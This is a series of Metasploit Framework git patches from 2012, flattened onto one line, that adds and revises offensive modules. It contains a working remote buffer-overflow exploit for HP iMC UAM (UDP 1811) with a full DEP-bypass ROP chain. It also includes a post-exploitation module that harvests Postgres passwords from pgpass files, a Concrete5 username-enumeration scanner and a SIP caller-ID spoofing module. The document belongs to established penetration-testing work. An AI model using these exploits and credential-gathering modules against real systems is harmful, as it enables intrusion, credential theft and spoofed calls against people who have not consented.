Gem::Specification.new do |s| s.specification_version = 3 if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then - s.add_development_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) else - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) end else - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 0f68a03c21..b38e60231f 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -120,7 +120,7 @@ class DBManager # are already in the object space begin unless defined? Mdm::Host - self.class.send :include, MetasploitDataModels + MetasploitDataModels.require_models end rescue NameError => e warn_about_rubies From 76c3decffb075f0a30c6928a46b0229c57b695f1 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Thu, 1 Nov 2012 08:57:57 -0500 Subject: [PATCH 51/64] Update Gemfile(.lock) to use tag 0.3.0 for metasploit_data_models Ensures that Gemfile uses same version as in gemcache. --- Gemfile | 2 +- Gemfile.lock | 7 ++++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/Gemfile b/Gemfile index 01703f0b04..825f532450 100755 --- a/Gemfile +++ b/Gemfile @@ -5,7 +5,7 @@ gem 'activesupport', '>= 3.0.0' # Needed for Msf::DbManager gem 'activerecord' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0' # Needed for module caching in Mdm::ModuleDetails gem 'pg', '>= 0.11' diff --git a/Gemfile.lock b/Gemfile.lock index a666ef8540..10894e9139 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,8 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: dd6c3a31c5ad8b55f4913b5ba20307178ba9c7bf + revision: 73f26789500f278dd6fd555e839d09a3b81a05f4 + tag: 0.3.0 specs: - metasploit_data_models (0.0.2) + metasploit_data_models (0.3.0) activerecord activesupport pg @@ -27,7 +28,7 @@ GEM coderay (1.0.8) diff-lcs (1.1.3) i18n (0.6.1) - method_source (0.8) + method_source (0.8.1) multi_json (1.3.6) pg (0.14.1) pry (0.9.10) From e7207697473731a285d142ec9b1690eafb742d1f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 Nov 2012 17:17:45 +0100 Subject: [PATCH 52/64] Added module for ZDI-12-171 --- modules/exploits/windows/misc/hp_imc_uam.rb | 128 ++++++++++++++++++++ 1 file changed, 128 insertions(+) create mode 100644 modules/exploits/windows/misc/hp_imc_uam.rb diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb new file mode 100644 index 0000000000..07c7b60a9e --- /dev/null +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -0,0 +1,128 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Intelligent Management Center UAM Buffer Overflow', + 'Description' => %q{ + This module exploits a remote buffer overflow in HP Intelligent Management Center + UAM. The vulnerability exists in the uam.exe component, when using sprint in a + insecure way for logging purposes. The vulnerability can be triggered by sending a + malformed packet to the 1811/UDP port. The module has been successfully tested on + HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['OSVDB', '85060'], + ['BID', '55271'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-171'] + ], + 'Payload' => + { + 'BadChars' => "\x00\x0d\x0a", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500 + 'Space' => 3925, + 'DisableNops' => true + }, + 'Platform' => ['win'], + 'Targets' => + [ + [ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2', + { + 'Offset' => 4035, + 'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Aug 29 2012', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(1811)], self.class) + end + + def junk(n=4) + return rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def send_echo_reply(operator) + packet = [0xF7103D21].pack("N") # command id + packet << rand_text(18) + packet << [0x102].pack("n") # watchdog command type => echo reply + packet << "AAAA" # ip (static to make offset until EIP static) + packet << "AA" # port (static to make offset until EIP static) + packet << operator # Operator max length => 4066, in order to bypass packet length restriction: 4096 total + + connect_udp + udp_sock.put(packet) + disconnect_udp + end + + + def exploit + + # ROP chain generated with mona.py - See corelan.be + rop_gadgets = + [ + 0x77bb2563, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bb2563, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bb2563, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bb2563, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + + bof = rand_text(14) + bof << rop_gadgets + bof << payload.encoded + bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length) + bof << [0x77bb0c86].pack("V") # XCHG EAX,ESI # RETN # from msvcrt.dll + bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll + bof << [junk].pack("V") # EBP + bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll + + print_status("Trying target #{target.name}...") + send_echo_reply(rand_text(20)) # something like... get up! ? + send_echo_reply(bof) # exploit + end +end From 22fbfb36013a7f4f21ab5596ea7b29df8c3085d3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 1 Nov 2012 17:38:04 +0100 Subject: [PATCH 53/64] cleanup --- modules/exploits/windows/misc/hp_imc_uam.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb index 07c7b60a9e..562af3e928 100644 --- a/modules/exploits/windows/misc/hp_imc_uam.rb +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -48,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2', { 'Offset' => 4035, - 'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe } ] ], @@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote bof << rop_gadgets bof << payload.encoded bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length) - bof << [0x77bb0c86].pack("V") # XCHG EAX,ESI # RETN # from msvcrt.dll + bof << [0x77bb0c86].pack("V") # EIP => XCHG EAX,ESI # RETN # from msvcrt.dll bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll bof << [junk].pack("V") # EBP bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll From b1b85bee441a0035cc25721ad4c86390920de0c4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 1 Nov 2012 14:53:18 -0500 Subject: [PATCH 54/64] Actually require PhpEXE mixin. --- modules/exploits/multi/http/auxilium_upload_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index a3190132eb..7edbbbf689 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'msf/core/exploit/php_exe' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking From 1a162d7dd9abd7353cc72c0fa35ec9e0056c1d0a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 01:15:47 -0500 Subject: [PATCH 55/64] Use Rex table, fix 1.8 syntax issues, format fixes --- modules/post/multi/gather/pgpass_creds.rb | 56 +++++++++++++++-------- 1 file changed, 36 insertions(+), 20 deletions(-) diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 8604023432..bf3d380ceb 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -1,5 +1,11 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' -require 'rex' require 'msf/core/post/file' require 'msf/core/post/common' require 'msf/core/post/unix' @@ -14,16 +20,15 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info(info, - 'Name' => 'Multi Gather pgpass Credentials', - 'Description' => %q{ + 'Name' => 'Multi Gather pgpass Credentials', + 'Description' => %q{ This module will collect the contents of user's .pgpass or pgpass.conf and - parse them for credentials. This module is largely based on firefox_creds.rb and - ssh_creds.rb. + parse them for credentials. }, - 'License' => MSF_LICENSE, - 'Author' => ['Zach Grace '], - 'Platform' => %w[linux bsd unix osx win], - 'SessionTypes' => %w[meterpreter shell] + 'License' => MSF_LICENSE, + 'Author' => ['Zach Grace '], + 'Platform' => %w[linux bsd unix osx win], + 'SessionTypes' => %w[meterpreter shell] )) end @@ -43,7 +48,7 @@ class Metasploit3 < Msf::Post grab_user_profiles.select do |user| f = "#{user['AppData']}\\postgresql\\pgpass.conf" if user['AppData'] && file?(f) - files << f + files << f end end else @@ -68,6 +73,12 @@ class Metasploit3 < Msf::Post # Store the creds to def parse_creds(f) + cred_table = Rex::Ui::Text::Table.new( + 'Header' => 'Postgres Data', + 'Indent' => 1, + 'Columns' => ['Host', 'Port', 'DB', 'User', 'Password'] + ) + read_file(f).each_line do |entry| ip, port, db, user, pass = entry.chomp.split(/:/, 5) @@ -93,21 +104,26 @@ class Metasploit3 < Msf::Post end pass = p - print_good("Retrieved postgres creds #{ip}:#{port}/#{db} #{user}:#{pass}") + cred_table << [ip, port, db, user, pass] cred_hash = { - host: session.session_host, - port: port, - user: user, - pass: pass, - ptype: "password", - sname: "postgres", - source_type: "Cred", - duplicate_ok: true, - active: true + :host => session.session_host, + :port => port, + :user => user, + :pass => pass, + :ptype => "password", + :sname => "postgres", + :source_type => "Cred", + :duplicate_ok => true, + :active => true } report_auth_info(cred_hash) end + + if not cred_table.rows.empty? + print_line + print_line(cred_table.to_s) + end end end From f3e03ddb4233ea4f4011d29fa7025dffefde6dfd Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 16:32:34 +0100 Subject: [PATCH 56/64] Concrete5 CMS member list scanner --- .../scanner/concrete5_member_list.rb | 137 ++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 modules/auxiliary/scanner/concrete5_member_list.rb diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/concrete5_member_list.rb new file mode 100644 index 0000000000..70953d1773 --- /dev/null +++ b/modules/auxiliary/scanner/concrete5_member_list.rb @@ -0,0 +1,137 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Concrete5 Member List', + 'Version' => '$Revision$', + 'Description' => %q{ + This module extracts username information from the Concrete5 member page + }, + 'References' => + [ + # General + [ 'URL', 'http://blog.c22.cc' ] + ], + 'Author' => [ 'Chris John Riley' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(80), + OptString.new('URI', [false, 'URL of the Concrete5 root', '/']), + ], self.class) + deregister_options('RHOST') + end + + def run_host(rhost) + # check the only one forward slash appears in the url + if datastore['URI'][0,1] == "/" + url = datastore['URI'] + else + url = "/" + datastore['URI'] + end + + begin + res = send_request_cgi({ + 'uri' => "#{url}/members", + 'method' => 'GET', + 'headers' => + { + 'User-Agent' => datastore['UserAgent'] + } + }, 25) + + rescue ::Rex::ConnectionError + print_error("#{rhost}:#{rport} Unable to connect to #{url}") + return + end + + if not res + print_error("#{rhost}:#{rport} Unable to connect to #{url}") + return + end + + # extract member info from response if present + if res and res.body =~ /ccm-profile-member-username/i + extract_members(res, url) + elsif res + print_status("#{rhost}:#{rport} No members listed or profiles disabled") + else + print_error("#{rhost}:#{rport} No response received") + end + + end + + def extract_members(res, url) + + members = res.body.scan(/
(.*)<\/div>/i) + + if members + print_good("#{rhost}:#{rport} Extracted #{members.length} entries") + + # separate user data into userID, username and Profile URL + memberlist = [] + users = [] + + members.each do | mem | + userid = mem[0].scan(/\/view\/(\d+)/i) + username = mem[0].scan(/">(.+)<\/a>/i) + profile = mem[0].scan(/href="(.+)">/i) + # add all data to memberlist for table output + memberlist.push([userid[0], username[0], profile[0]]) + # add usernames to users array for reporting + users.push(username[0]) + end + + membertbl = Msf::Ui::Console::Table.new( + Msf::Ui::Console::Table::Style::Default, + 'Header' => "Concrete5 members", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' => + [ + "UserID", + "Username", + "Profile" + ]) + + memberlist.each do | mem | + membertbl << ["#{mem[0].join}", "#{mem[1].join}", "#{mem[2].join}"] + end + + # print table + print(membertbl.to_s) + + #store username to loot + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :type => "concrete5 CMS members", + :data => {:proto => "http", :users => users.join(",")}, + ) + + else + print_status("#{rhost}:#{rport} Unable to extract members") + end + end +end From 01b13480cbb8eef1d4be82ebe3894cb025233a72 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 16:45:41 +0100 Subject: [PATCH 57/64] Added concrete5.org references --- modules/auxiliary/scanner/concrete5_member_list.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/concrete5_member_list.rb index 70953d1773..f52263fa55 100644 --- a/modules/auxiliary/scanner/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/concrete5_member_list.rb @@ -27,7 +27,10 @@ class Metasploit4 < Msf::Auxiliary 'References' => [ # General - [ 'URL', 'http://blog.c22.cc' ] + [ 'URL', 'http://blog.c22.cc' ], + # Concrete5 + [ 'URL', 'http://www.concrete5.org'], + [ 'URL', 'http://www.concrete5.org/documentation/using-concrete5/dashboard/users-and-groups/'] ], 'Author' => [ 'Chris John Riley' ], 'License' => MSF_LICENSE From 954ccf1ca125a9fe8a8d20474b083019ca8c73a6 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 12:54:38 +0100 Subject: [PATCH 58/64] Added ability to set extension on target --- modules/auxiliary/voip/sip_invite_spoof.rb | 26 +++++++++++++++------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 0cecb17e21..943509797c 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -1,5 +1,5 @@ ## -# $Id$ +# $Id: sip_invite_spoof.rb 15390 2012-06-05 03:03:05Z rapid7 $ ## ## @@ -21,9 +21,9 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Invite Spoof', - 'Version' => '$Revision$', + 'Version' => '$Revision: 15390 $', 'Description' => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.', - 'Author' => 'David Maynor ', + 'Author' => '[David Maynor , ChrisJohnRiley]', 'License' => MSF_LICENSE ) @@ -32,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RPORT(5060), OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']), - OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]) + OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]), + OptString.new('EXTENSION', [false, "The specific extension or name to target", nil]) ], self.class) end @@ -43,18 +44,27 @@ class Metasploit3 < Msf::Auxiliary name = datastore['MSG'] src = datastore['SRCADDR'] + ext = datastore['EXTENSION'] + + if not ext.nil? and not ext.empty? + # set extesion name/number + conn_string = "#{ext}@#{ip}" + else + conn_string = "#{ip}" + end + connect_udp - print_status("Sending Fake SIP Invite to: #{ip}") + print_status("Sending Fake SIP Invite to: #{conn_string}") - req = "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n" - req << "To: " + "\r\n" + req = "INVITE sip:#{conn_string} SIP/2.0" + "\r\n" + req << "To: " + "\r\n" req << "Via: SIP/2.0/UDP #{ip}" + "\r\n" req << "From: \"#{name}\"" + "\r\n" req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n" req << "CSeq: 1 INVITE" + "\r\n" req << "Max-Forwards: 20" + "\r\n" - req << "Contact: " + "\r\n\r\n" + req << "Contact: " + "\r\n\r\n" udp_sock.put(req) disconnect_udp From 891ad4685c5d327c6d9bb883f3f09a0bc06f5422 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Fri, 2 Nov 2012 13:01:20 +0100 Subject: [PATCH 59/64] $Id and $Revision --- modules/auxiliary/voip/sip_invite_spoof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 943509797c..b95397a780 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -1,5 +1,5 @@ ## -# $Id: sip_invite_spoof.rb 15390 2012-06-05 03:03:05Z rapid7 $ +# $Id$ ## ## @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Invite Spoof', - 'Version' => '$Revision: 15390 $', + 'Version' => '$Revision$', 'Description' => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.', 'Author' => '[David Maynor , ChrisJohnRiley]', 'License' => MSF_LICENSE From 38518478bdf176e5d0d78e75348ef160e138fd83 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 11:23:35 -0500 Subject: [PATCH 60/64] Format/msftidy fixes --- modules/auxiliary/voip/sip_invite_spoof.rb | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index b95397a780..ff0b9db381 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -9,10 +5,8 @@ # http://metasploit.com/ ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp @@ -21,9 +15,15 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SIP Invite Spoof', - 'Version' => '$Revision$', - 'Description' => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.', - 'Author' => '[David Maynor , ChrisJohnRiley]', + 'Description' => %q{ + This module will create a fake SIP invite request making the targeted device ring + and display fake caller id information. + }, + 'Author' => + [ + 'David Maynor ', + 'ChrisJohnRiley' + ], 'License' => MSF_LICENSE ) @@ -48,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary if not ext.nil? and not ext.empty? # set extesion name/number - conn_string = "#{ext}@#{ip}" + conn_string = "#{ext}@#{ip}" else - conn_string = "#{ip}" + conn_string = "#{ip}" end connect_udp From a9db59feb752820c9ff51bf48ebe5894132d44b8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 14:52:02 -0500 Subject: [PATCH 61/64] Cosmetic changes, mostly --- .../scanner/concrete5_member_list.rb | 46 +++++++++---------- 1 file changed, 22 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/concrete5_member_list.rb index f52263fa55..ef4d0d9815 100644 --- a/modules/auxiliary/scanner/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/concrete5_member_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,8 +15,7 @@ class Metasploit4 < Msf::Auxiliary def initialize super( - 'Name' => 'Concrete5 Member List', - 'Version' => '$Revision$', + 'Name' => 'Concrete5 Member List Enumeration', 'Description' => %q{ This module extracts username information from the Concrete5 member page }, @@ -39,11 +34,15 @@ class Metasploit4 < Msf::Auxiliary register_options( [ Opt::RPORT(80), - OptString.new('URI', [false, 'URL of the Concrete5 root', '/']), + OptString.new('URI', [false, 'URL of the Concrete5 root', '/']) ], self.class) deregister_options('RHOST') end + def peer + "#{rhost}:#{rport}" + end + def run_host(rhost) # check the only one forward slash appears in the url if datastore['URI'][0,1] == "/" @@ -63,12 +62,12 @@ class Metasploit4 < Msf::Auxiliary }, 25) rescue ::Rex::ConnectionError - print_error("#{rhost}:#{rport} Unable to connect to #{url}") + print_error("#{peer} Unable to connect to #{url}") return end if not res - print_error("#{rhost}:#{rport} Unable to connect to #{url}") + print_error("#{peer} Unable to connect to #{url}") return end @@ -76,19 +75,18 @@ class Metasploit4 < Msf::Auxiliary if res and res.body =~ /ccm-profile-member-username/i extract_members(res, url) elsif res - print_status("#{rhost}:#{rport} No members listed or profiles disabled") + print_status("#{peer} No members listed or profiles disabled") else - print_error("#{rhost}:#{rport} No response received") + print_error("#{peer} No response received") end end def extract_members(res, url) - members = res.body.scan(/
(.*)<\/div>/i) if members - print_good("#{rhost}:#{rport} Extracted #{members.length} entries") + print_good("#{peer} Extracted #{members.length} entries") # separate user data into userID, username and Profile URL memberlist = [] @@ -103,38 +101,38 @@ class Metasploit4 < Msf::Auxiliary # add usernames to users array for reporting users.push(username[0]) end - + membertbl = Msf::Ui::Console::Table.new( - Msf::Ui::Console::Table::Style::Default, + Msf::Ui::Console::Table::Style::Default, { 'Header' => "Concrete5 members", 'Prefix' => "\n", 'Postfix' => "\n", 'Indent' => 1, 'Columns' => [ - "UserID", - "Username", - "Profile" - ]) + "UserID", + "Username", + "Profile" + ]}) memberlist.each do | mem | membertbl << ["#{mem[0].join}", "#{mem[1].join}", "#{mem[2].join}"] end - + # print table print(membertbl.to_s) #store username to loot - report_note( + report_note({ :host => rhost, :port => rport, :proto => 'tcp', :type => "concrete5 CMS members", - :data => {:proto => "http", :users => users.join(",")}, - ) + :data => {:proto => "http", :users => users.join(",")} + }) else - print_status("#{rhost}:#{rport} Unable to extract members") + print_error("#{peer} Unable to extract members") end end end From ea5dc940d246e6daea067a897a99f29be5f0c80b Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 14:52:28 -0500 Subject: [PATCH 62/64] Move module to the correct directory --- modules/auxiliary/scanner/{ => http}/concrete5_member_list.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/{ => http}/concrete5_member_list.rb (100%) diff --git a/modules/auxiliary/scanner/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb similarity index 100% rename from modules/auxiliary/scanner/concrete5_member_list.rb rename to modules/auxiliary/scanner/http/concrete5_member_list.rb From a161c1faa06c548a0b3208ac04ffe9225107b15c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 15:06:51 -0500 Subject: [PATCH 63/64] Final changes --- .../scanner/http/concrete5_member_list.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index ef4d0d9815..153819777b 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -52,14 +52,7 @@ class Metasploit4 < Msf::Auxiliary end begin - res = send_request_cgi({ - 'uri' => "#{url}/members", - 'method' => 'GET', - 'headers' => - { - 'User-Agent' => datastore['UserAgent'] - } - }, 25) + res = send_request_raw({'uri' => "#{url}/index.php/members"}) rescue ::Rex::ConnectionError print_error("#{peer} Unable to connect to #{url}") @@ -72,9 +65,10 @@ class Metasploit4 < Msf::Auxiliary end # extract member info from response if present - if res and res.body =~ /ccm-profile-member-username/i + if res and res.body =~ /ccm\-profile\-member\-username/i extract_members(res, url) elsif res + print_line(res.body) print_status("#{peer} No members listed or profiles disabled") else print_error("#{peer} No response received") @@ -83,7 +77,7 @@ class Metasploit4 < Msf::Auxiliary end def extract_members(res, url) - members = res.body.scan(/
(.*)<\/div>/i) + members = res.body.scan(/
(.*)<\/div>/i) if members print_good("#{peer} Extracted #{members.length} entries") From 1d26491b77bbb37a031c34108ea587e0be7e895e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 2 Nov 2012 15:09:30 -0500 Subject: [PATCH 64/64] Ok... last fix, really --- modules/auxiliary/scanner/http/concrete5_member_list.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index 153819777b..7c0cb55d3c 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -114,7 +114,7 @@ class Metasploit4 < Msf::Auxiliary end # print table - print(membertbl.to_s) + print_line(membertbl.to_s) #store username to loot report_note({